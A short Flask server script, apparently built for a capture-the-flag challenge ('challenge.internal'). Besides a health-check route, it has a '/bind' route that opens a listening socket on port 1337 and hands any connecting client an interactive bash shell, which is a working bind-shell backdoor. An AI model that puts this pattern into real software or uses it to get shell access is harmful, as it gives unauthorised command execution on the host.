#!/usr/bin/env python

import os
import socket
import subprocess

from flask import Flask

app = Flask(__name__)


@app.route("/", methods=["GET"])
def health():
    return "OK\n", 200


@app.route("/bind")
def connect():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 1337))
    s.listen()

    conn, addr = s.accept()

    [os.dup2(conn.fileno(), fd) for fd in (0, 1, 2)]

    subprocess.call(["/bin/bash", "-i"])

    return "Shell spawned!"


app.config["SERVER_NAME"] = "challenge.internal"
app.run(
    "challenge.internal",
    443,
    ssl_context=(
        "/etc/ssl/certs/internal.cert.pem",
        "/etc/ssl/private/internal.key.pem",
    ),
)
